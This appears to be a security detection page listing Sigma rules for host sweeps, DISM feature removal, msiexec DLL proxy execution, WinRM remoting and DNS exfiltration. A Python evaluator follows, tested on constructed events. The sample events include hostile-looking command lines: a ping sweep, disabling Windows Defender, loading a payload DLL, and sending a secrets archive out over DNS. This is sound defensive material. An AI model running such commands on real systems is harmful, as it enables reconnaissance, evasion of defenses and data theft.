Techniques
Sample rules
Suspicious Scan Loop Network
- source: sigma
- techniques:
    - t1018 (Remote System Discovery)
    - t1059 (Command and Scripting Interpreter)
Description
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. The rule looks for a shell loop (for or foreach) wrapping ping or nslookup, the typical shape of a scripted host sweep; a lone ping or nslookup does not match.
Detection logic
selection_loop:
    CommandLine|contains:
        - 'for '
        - 'foreach '
selection_tools:
    CommandLine|contains:
        - nslookup
        - ping
condition: all of selection_*
Dism Remove Online Package
- source: sigma
- techniques:
    - t1562 (Impair Defenses)
    - t1562.001 (Disable or Modify Tools)
Description
DISM (Deployment Image Servicing and Management) is the built-in tool used to enumerate, install, uninstall, configure, and update features and packages in Windows images. With /Online it acts on the running installation, so /Disable-Feature can switch off security features, which is why the rule is mapped to defense evasion. It matches that switch combination both on Dism.exe itself and on the DismHost.exe helper it spawns, whose parent command line carries the same switches.
Detection logic
selection_dism:
    Image|endswith: \Dism.exe
    CommandLine|contains|all:
        - /Online
        - /Disable-Feature
selection_dismhost:
    Image|endswith: \DismHost.exe
    ParentCommandLine|contains|all:
        - /Online
        - /Disable-Feature
condition: 1 of selection_*
Suspicious Msiexec Execute Arbitrary DLL
- source: sigma
- techniques:
    - t1218 (System Binary Proxy Execution)
    - t1218.007 (Msiexec)
Description
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). Its /y (or -y) switch loads the named DLL and calls its DllRegisterServer export, so msiexec /y <path to DLL> runs arbitrary DLL code under a signed Microsoft binary. The windash modifier makes the selection match both the dash and the slash form of the switch, and the filter removes known legitimate self-registrations (Apple Bonjour and Apple Software Update, and the SCCM client directory C:\Windows\CCM\).
Detection logic
selection:
    Image|endswith: \msiexec.exe
    CommandLine|contains|windash: ' -y'
filter_apple:
    CommandLine|contains:
        - \MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll
        - \MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll
        - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll
        - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll
        - \MsiExec.exe" /Y "C:\Windows\CCM\
        - \MsiExec.exe" /Y C:\Windows\CCM\
        - \MsiExec.exe" -Y "C:\Program Files\Bonjour\mdnsNSP.dll
        - \MsiExec.exe" -Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll
        - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll
        - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll
        - \MsiExec.exe" -Y "C:\Windows\CCM\
        - \MsiExec.exe" -Y C:\Windows\CCM\
condition: selection and not 1 of filter_*
Enable Windows Remote Management
- source: sigma
- techniques:
    - t1021 (Remote Services)
    - t1021.006 (Windows Remote Management)
Description
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. Enable-PSRemoting configures the local host to accept WinRM connections (it starts the WinRM service and sets up its listener and firewall rules), so its appearance in a script block on a host that is not normally managed that way is worth a look. The ScriptBlockText field comes from PowerShell script block logging, which must be enabled for this rule and the two below to fire at all.
Detection logic
selection_cmdlet:
    ScriptBlockText|contains: 'Enable-PSRemoting '
condition: selection_cmdlet
Powershell DNSExfiltration
- source: sigma
- techniques:
    - t1048 (Exfiltration Over Alternative Protocol)
Description
DNSExfiltrator transfers (exfiltrates) a file over a covert channel built from DNS requests. The rule fires either on the Invoke-DNSExfiltrator cmdlet name or on its characteristic parameter set (-i, -d, -p, -doh and -t all present), so a copy of the script with the function renamed still matches as long as the parameters are kept.
Detection logic
selection_cmdlet:
    - ScriptBlockText|contains: Invoke-DNSExfiltrator
    - ScriptBlockText|contains|all:
        - ' -i '
        - ' -d '
        - ' -p '
        - ' -doh '
        - ' -t '
condition: selection_cmdlet
Execute Invoke-command on Remote Host
- source: sigma
- techniques:
    - t1021 (Remote Services)
    - t1021.006 (Windows Remote Management)
Description
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. Invoke-Command with -ComputerName runs a script block on the named host over WinRM; the rule matches the cmdlet name together with that parameter in script block logs. Administrators use the same cmdlet heavily, so expect to baseline the accounts and source hosts that legitimately do this before alerting on it.
Detection logic
selection_cmdlet:
    ScriptBlockText|contains|all:
        - 'invoke-command '
        - ' -ComputerName '
condition: selection_cmdlet
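The detection blocks above run over sample events, as an added example that is not code from the Sigma project or from this page: a minimal Python evaluator for the condition shapes the page uses (a bare selection, all of, 1 of, and A and not B) and the modifiers contains, all, endswith and windash, applied to the Scan Loop, Dism, Msiexec and DNSExfiltration rules. It assumes events are flat dicts keyed by the Sigma field names (Image, CommandLine, ParentCommandLine, ScriptBlockText) and that matching is case-insensitive, which is Sigma's default. The sample events are constructed, the msiexec filter list is cut to two of the page's entries, and the windash handling is simplified to swapping every dash in the pattern.

```python
"""Added example (not code from the Sigma project or this page): a minimal
evaluator for the detection fragments above, run over constructed events.
Assumed, not stated on the page: events are flat dicts keyed by the Sigma field
names (Image, CommandLine, ParentCommandLine, ScriptBlockText); matching is
case-insensitive, Sigma's default for string comparisons."""
import re


def _match_field(event, key, patterns):
    """One 'Field|modifier|...' item: supports contains, all, endswith, windash."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    pats = patterns if isinstance(patterns, list) else [patterns]

    def hit(pat):
        pat = str(pat).lower()
        # windash: a switch written with '-' also matches '/' and vice versa
        # (simplified here to swapping every dash in the pattern)
        variants = {pat, pat.replace("-", "/"), pat.replace("/", "-")} if "windash" in mods else {pat}
        if "endswith" in mods:
            return any(value.endswith(v) for v in variants)
        if "contains" in mods:
            return any(v in value for v in variants)
        return value in variants  # no modifier: exact match

    hits = [hit(p) for p in pats]
    return all(hits) if "all" in mods else any(hits)


def _match_selection(event, sel):
    """A mapping ANDs its fields; a list of mappings ORs them (Sigma semantics)."""
    if isinstance(sel, list):
        return any(_match_selection(event, s) for s in sel)
    return all(_match_field(event, k, v) for k, v in sel.items())


def evaluate(detection, event):
    """Condition shapes used on this page: 'X', 'all of X*', '1 of X*', 'A and not B'."""
    sels = {k: v for k, v in detection.items() if k != "condition"}

    def term(text):
        m = re.fullmatch(r"(all|1) of (\w+)\*", text.strip())
        if m:
            hits = [_match_selection(event, v) for k, v in sels.items() if k.startswith(m.group(2))]
            return all(hits) if m.group(1) == "all" else any(hits)
        return _match_selection(event, sels[text.strip()])

    cond = detection["condition"]
    if " and not " in cond:
        left, right = cond.split(" and not ", 1)
        return term(left) and not term(right)
    return term(cond)


RULES = {  # the page's detection blocks, transcribed; the msiexec filter list is cut to two entries
    "Suspicious Scan Loop Network": {
        "selection_loop": {"CommandLine|contains": ["for ", "foreach "]},
        "selection_tools": {"CommandLine|contains": ["nslookup", "ping"]},
        "condition": "all of selection_*"},
    "Dism Remove Online Package": {
        "selection_dism": {"Image|endswith": "\\Dism.exe",
                           "CommandLine|contains|all": ["/Online", "/Disable-Feature"]},
        "selection_dismhost": {"Image|endswith": "\\DismHost.exe",
                               "ParentCommandLine|contains|all": ["/Online", "/Disable-Feature"]},
        "condition": "1 of selection_*"},
    "Suspicious Msiexec Execute Arbitrary DLL": {
        "selection": {"Image|endswith": "\\msiexec.exe", "CommandLine|contains|windash": " -y"},
        "filter_apple": {"CommandLine|contains": [
            '\\MsiExec.exe" /Y "C:\\Program Files\\Bonjour\\mdnsNSP.dll',
            '\\MsiExec.exe" /Y "C:\\Windows\\CCM\\']},
        "condition": "selection and not 1 of filter_*"},
    "Powershell DNSExfiltration": {
        "selection_cmdlet": [{"ScriptBlockText|contains": "Invoke-DNSExfiltrator"},
                             {"ScriptBlockText|contains|all": [" -i ", " -d ", " -p ", " -doh ", " -t "]}],
        "condition": "selection_cmdlet"},
}

SAMPLE_EVENTS = {  # constructed for this example, not real telemetry
    "scan_loop": {"Image": "C:\\Windows\\System32\\cmd.exe",
                  "CommandLine": "cmd /c for /L %i in (1,1,254) do ping -n 1 10.0.0.%i"},
    "dism_child": {"Image": "C:\\Users\\u\\AppData\\Local\\Temp\\DismHost.exe",
                   "ParentCommandLine": "Dism.exe /Online /Disable-Feature /FeatureName:Windows-Defender"},
    "msiexec_benign": {"Image": "C:\\Windows\\System32\\MsiExec.exe",
                       "CommandLine": '"C:\\Windows\\System32\\MsiExec.exe" /Y "C:\\Program Files\\Bonjour\\mdnsNSP.dll"'},
    "msiexec_suspicious": {"Image": "C:\\Windows\\System32\\msiexec.exe",
                           "CommandLine": "msiexec.exe /y C:\\Users\\Public\\payload.dll"},
    "dns_exfil_renamed": {"ScriptBlockText": "Invoke-Exfil -i secrets.zip -d example.com -p Passw0rd -doh google -t 500"},
    "benign_ping": {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "ping -n 1 fileserver01"},
}


def run_rules(event, rules=RULES):
    """Return the names of the rules whose detection logic matches the event."""
    return [name for name, det in rules.items() if evaluate(det, event)]


if __name__ == "__main__":
    for label, ev in SAMPLE_EVENTS.items():
        print(f"{label}: {run_rules(ev) or 'no match'}")
```

Running the script prints one line per sample event. Two results are the ones to notice: the Bonjour self-registration matches the msiexec selection but is dropped by the filter, and the renamed DNSExfiltrator call still matches through the parameter-set branch of selection_cmdlet, while the DismHost.exe child is caught purely through its parent command line.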